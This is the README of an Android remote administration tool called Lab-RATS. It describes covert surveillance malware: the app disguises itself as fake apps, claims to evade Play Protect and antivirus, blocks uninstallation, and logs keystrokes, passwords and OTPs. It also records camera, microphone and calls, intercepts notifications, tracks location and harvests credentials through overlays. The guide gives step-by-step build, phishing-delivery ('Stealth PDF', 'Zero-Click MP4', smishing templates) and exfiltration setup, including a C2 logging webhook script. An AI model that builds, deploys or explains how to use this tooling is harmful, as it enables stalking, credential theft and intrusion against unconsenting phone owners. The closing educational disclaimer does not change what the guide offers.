Lightweight Android-Built Remote Administration Tool for Security: (L.A.B. - R.A.T.S)
Lab-RATS is an open-source, lightweight Android Remote Administration framework packed with powerful monitoring and interaction capabilities. The system automates the generation of custom, signed .apk files for deployment onto any Android device, providing full device telemetry via a sleek, web-based C2 dashboard. Built to adapt to strict modern mobile environments, it delivers a robust feature suite that operates reliably across both legacy and the newest Android releases.
Lab-RATS leverages the unique characteristics of publicly routable IPv6 addresses assigned by modern Wi-Fi and cellular (5G/LTE) carriers. By binding the control server directly to a device's Global Unicast Address (GUA), the tool completely bypasses Carrier-Grade NAT (CGNAT) and inbound firewall restrictions. This architecture enables seamless, Zero-Configuration peer-to-peer (P2P) remote access from any modern web browser worldwideโcompletely eliminating the need for router manipulation, port forwarding, or third-party tunneling services like Ngrok or Pinggy.
- The web dashboard is protected by a secure login wall (Default Password: admin1337). The password can be changed directly from the Terminal home page for enhanced security.
- Implemented a masked credential handshake. Passwords are reversed and Base64 encoded (
0x_prefixed) on the client-side before transmission, rendering them invisible to browser Network/Payload inspectors.
- Instantly build
signed.apkfor production and testing. - Fully customize App Name, Package ID, and Minimum SDK.
- Resize logos automatically for all Android screen densities.
- The remote web interface is fully optimized for both PC and smartphone browsers, featuring a touch-friendly layout, adaptive navigation tabs, and scalable UI elements for monitoring from any device.
- The Weaponization Engine has been overhauled to support multiple high-success delivery methods (Stealth PDF, Zero-Click MP4, Meeting Invite and Many More), ensuring reliable access across all modern mobile environments.
- Undetectable by Samsung Knox, McAfee and Google Play Protect.
- Deep Stealth HTML Shield: The C2 interface utilizes Shadow DOM Cloaking and Base64 Payload Wrapping. Browser "Elements" inspection is zeroed-out, and the tactical structure is ghosted from analysts.
- Web Hardening: Assets (JS/CSS) are minified and obfuscated; featuring anti-debugging loops and interaction locks (Right-Click, F12) to prevent unauthorized analysis.
- Dynamic Code Obfuscation: Build-time randomization of logic flow and class names via ProGuard/R8 integration.
- Encrypted Local Telemetry: Internal system logs are encrypted at build-time, rendering them unreadable to standard mobile forensic tools.
Remotely swap the entire Lab-RATS app identity and icon instantly using the "Masquerade Library" of convincing Fully Functional Clones:
- ๐ System Update (Default): Used for initial install it simulates a system update and prompts for permissions during the process, achieving highly successful installs.
- ๐งฎ Calculator: Performs actual math with a tactical logic engine.
- ๐ฆ๏ธ Weather App: Displays real-time localized forecasts via Open-Meteo API.
- ๐ก๏ธ Play Protect: Simulates a legitimate security scan to build target trust.
- ๐ญ Lab-Rats & System Stability Services: Completely unmasked and directly opens the C2 server interface on device.
- Dialer Unlock: Type
*#1337#on the phone's keypad to unmask the Lab-RATS server interface back into view. - Hidden Backdoor: If the device is in stealth mode, rapidly tap the middle of the decoy screen 10 times to unlock the C2 server interface. (Reverts to stealth mode again once app is closed)
- Automatically detects and repairs damaged service bindings or revoked permissions in the background.
- Anti-Removal: On by default in the Ghost Tab, it prevents the user from uninstalling or force-stopping the app via Settings.
- Web UI: One-click "RESTART_SERVER" button on the Terminal tab to refresh background services.
- SMS Backdoor: Send an SMS/Text containing
!RESTART_C2to the devices number to force the server back online even if it was manually closed or killed by the OS.
- The app is hard-coded to be invisible in the Android "Recent Apps" list.
- Generates random version names and codes that mimic legitimate system OTA updates.
- Ghost Control/Live Feed: Cast & Control the live screen remotely with NO "Consent Prompt" required.
- Blackout Mode: A high-stealth mode designed to physically mask the targets device display while maintaining a NON-masked live remote feed. (Pair with Ghost Control for maximum stealth)
- NEW! Ghost_Toast: Remotely deploy tactical, persistent pop-up overlays with fully customizable text (color, size, and screen positioning). Features multiple animation styles (pop, static, and side-scroll) alongside a high-intensity "Burnt_Toast" mode that floods the screen with randomized pop-ups to overwhelm the device.
- NEW! Remote System Denial Lock: Deploy a persistent, full-screen security overlay to lock physical interaction and render the device inoperable until hard-reset/restarted or unlocked remotely from the C2 dashboard.
- Live Keylogging: Intercept keystrokes and system text in real-time. Now features Sensitive Info Highlighting (Passcodes, OTPs, Emails glow Red) and Deep Extraction for browser login info.
- NFC Proximity Vector: Generate binary NDEF payloads for physical tags.
- QR Visual Vector: Dedicated high-density QR code generator for independent URL delivery.
- Smishing Library: Pre-configured tactical phishing templates with automated C2 link injection.
- Shadow Overlay: Remotely inject functional, pixel-perfect credential-harvesting overlays to the device.
- High-speed, event-driven protection that blocks attempts to Uninstall or Force Stop the app.
- Suicide Protocol (Self-Destruct): Remote-triggered persistent loop that wipes all local configuration and initiates a hard uninstallation of the C2 core.
- One-click uplink to open the devices exact real-time location in Google Maps.
- Intercept every notification (WhatsApp, Telegram, RCS, System...etc) in a live feed.
- Covert Recording: Stealthily record video without any user-facing activity.
- Snap Photos: Covert image capture integrated into the live stream.
- Nightmode V2: Aggressive electronic brightening for low-light environments. Now features Hardware Breathe Sync and AE Bypass for zero-freeze operation on modern high-latency sensors.
- Timed or Live microphone recording and automated call recording for both incoming and outgoing calls.
- Integrated File Manager: Navigate, download, and manage files. Features an instant Search Bar and Category Filters.
- Info Gathering: Access Call Logs, Contacts, Hardware Analytics, and Installed Apps remotely.
- ๐ Direct File Editor: Live-edit text, JSON, and log files directly on the device.
The Terminal Tabs Built-in Shell has been overhauled for professional workflows:
- Command History: Navigate previous commands instantly using Up/Down arrows.
- Modernized Interface: Updated to
root@Androidprompt with an updatedhelpmenu. - Hardened I/O: Multi-stage retry logic and unique execution tracking for zero-latency command output.
- C2 Auto-Reporting: Discrete reporting of Date & Time, Device Make & Model, Connection Type (WiFi/Cellular), IP Address, Port, Active C2 Dashboard Link, Battery %, Stealth Status, Charging Status, and Storage Space to a centralized Google Sheet or Render C2.
Lab-RATS now features a high-performance bridge to the Termux environment. If Termux is installed on the target device, the remote terminal can instantly elevate its capabilities:
- Auto-Routing: Common commands like
pkg,apt,pip, andpythonare routed through the bridge. - Unrestricted Tools: Install and run Python scripts, Nmap scans, or Metasploit from the C2 web terminal.
- Persistent Environment: Full support for Termux's internal storage and standard Linux binaries.
Note
Termux Bridge Issues: "Termux allow-external-apps setting is disabled" (Most Common).
Solution: On the Target Device open Termux and run:
echo "allow-external-apps = true" >> ~/.termux/termux.properties
termux-reload-settings
Lab-RATS supports two primary methods for tracking your device fleet and receiving remote data.
Best for basic IP tracking and logging. No server maintenance required.
- Create a new Google Sheet.
- Go to Extensions โ Apps Script and Paste in the Hybrid Snippet below:
function doGet(e) { return handleRequest(e); }
function doPost(e) { return handleRequest(e); }
function handleRequest(e) {
try {
var ss = SpreadsheetApp.getActiveSpreadsheet();
var sheet = ss.getSheetByName("LabRATS Logs") || ss.insertSheet("LabRATS Logs");
// Auto-initialize headers if new sheet
if (sheet.getLastRow() == 0) {
sheet.appendRow([
"Timestamp",
"Model #",
"Connection Type",
"IP Address",
"Port",
"Active C2 Link",
"Battery",
"Stealth Status",
"Power",
"Free Storage"
]);
}
var data = (e.postData && e.postData.contents) ? JSON.parse(e.postData.contents) : e.parameter;
var row = [
new Date(),
data.device || data.model || "Unknown",
data.network || "Unknown",
data.ip || "Unknown",
data.port || "9191",
data.link || "Handshake_Pending",
data.battery || "0%",
(data.stealth === true || data.stealth === "true") ? "ACTIVE" : "OFF",
data.charging || "Discharging",
data.storage || "Unknown"
];
sheet.appendRow(row);
return ContentService.createTextOutput("SUCCESS").setMimeType(ContentService.MimeType.TEXT);
} catch (err) {
return ContentService.createTextOutput("ERROR: " + err.message).setMimeType(ContentService.MimeType.TEXT);
}
}- Click Deploy โ New Deployment โ Web App โ Execute as Me (E-Mail) โ Who has Access: Anyone.
Important
4. Copy the Webhook URL provided and prepare to paste it into the APK-builder tool when prompted. (Get Started Section Below)
Best for professional fleet management and Automatic File Exfiltration.
- Host the Backend: Use the source code in the
/c2-serverdirectory. You can host this on platforms like Render, Railway, or your own VPS. - Get your URL: Once your service is live, copy the URL (e.g.,
https://labrats-c2.onrender.com). - Hard-code the Link: Enter the Render URL into the APK Builder when prompted for the
WEBHOOK_URL.
Advantages of Option 2:
- ๐ Dual-Stack IP Binding: Full support for both IPv4 and IPv6 connections, enabling seamless C2 telemetry and reverse WebSocket tunneling across cellular carrier NAT64 and dual-stack Wi-Fi networks.
- ๐ Exfiltration Vault: Audio/Video recordings are automatically uploaded and stored on your server.
- ๐ก Live Fleet List: A professional glass-morphism dashboard to manage all "Rats" in one place.
- ๐ Dynamic Sync: Heartbeat reporting ensures your P2P links are always up-to-date.
- Java 17 or 21 installed on your workstation.
- A Test Android device. ๐ฑ (Samsung/Pixel/OnePlus/HTC supported)
- Your Google Sheet Webhook URL or Render URL. (previous sections above)
- Download the Repo:
git clone https://github.com/K4N3CO/Lab-RATS.git - Navigate to:
cd /Lab-RATS/apk-builder/ - Execute the Builder:
- Mac/Linux:
chmod +x build.sh && ./build.sh - Windows:
build.bat
- Mac/Linux:
- Select a Build Strategy:
- Option 1 (Manual): For basic configuration of App Name, ID, and Logo before building.
- Option 6 (Infection Chain Wizard): For the Full Build โ Host โ Weaponize flow.
- Enter your Google Sheet Webhook URL or Render URL when prompted to enable remote device IP reporting.
- Retrieve your
signed.apk(and any weaponized payloads like PDFs or MP4s) from theLab-RATS/apk-builder/output/directory.
Deployment is a multi-stage process involving Weaponization, Hosting, and Execution.
Standard .apk files are often blocked by email filters and browser security. Use the Infection Chain Wizard (Option 6) in the apk-buildertool to wrap your link inside a high-compatibility carrier file:
- ๐ Stealth PDF (Highly Recommended): Send to targets via Email or Drive. It utilizes URI Actions instead of JavaScript to trigger an automatic browser-based download, bypassing standard PDF security filters.
- ๐ฌ Zero-Click MP4: Send as a video file. It exploits mobile Media Heap Overflows during gallery indexing or thumbnail generation to force-register the C2 link in the background.
- ๐๏ธ Meeting Invite (ICS): Injects a persistent event into the target's Calendar with automated reminders and a weaponized "Security Review" link.
- ๐ณ QR Code / ๐ก NFC: Best for physical placement or "Tap-to-Infect" proximity delivery. Generates a high-density QR or NDEF record pointing to the hardened delivery URL.
- and Many More: The Wizard also supports ADB Strategic Bridge, Stego Image Tails, PWA Manifests, and Office Document macros.
- Anonymous Cloud: Option 6 uses Catbox.moe by default. It is anonymous, fast, and generates a direct link.
- P2P Direct: Host the APK directly from your PC using a public tunnel, or from another infected device using the
/download/endpoint.
Once the Target device downloads the APK:
- Manual Sideload: If you have physical access to the device, use
adb install signed.apk - Permissions (CRITICAL): Open the app ONCE. It will prompt for necessary permissions (Camera, SMS, Files, etc).
- Remote Permission Prompt: If the user skips some permissions, you can remotely trigger the system prompt again from the Ghost Tab using the REPAIR PERMISSIONS button.
- Self-Vanishing: A few seconds after launch, the app will automatically replace its icon and name with the decoy you chose during build ("System Update", "Calculator"...etc).
- Uplink Confirmation: Check your Google Sheet. Within 5 seconds of initialization, the Device Make & Model, Connection Type, IP Address, Port, Active C2 Dashboard Link, Battery %, Stealth Status, Charging Status and Storage Space will appear in the log.
If you find Lab-RATS awesome and useful for your security research, please Star โญ the projectโit drives further development!!
Bug Reports, Add New Feature and Pull Requests are always welcome!. (See CONTRIBUTING.md for more info.)
https://buymeacoffee.com/k4n3co
bc1q8d66m0qthnh6nw9hc5wl09m7pfydk46q5w8rxx
APK-Builder_Example.mov
Initial_Install_Example.mov
Screen.Recording.2026-10-03.at.3.54.01.AM.mov
Screen.Recording.2026-09-19.at.12.09.42.AM.mov
This tool is for educational and authorized security testing purposes ONLY!. The developers & contributors assume NO responsibility for ANY misuse, damage to devices or relationships caused by this software. Please use it responsibly. Thank you!
This project is Licensed to K4N3CO under the MIT License.















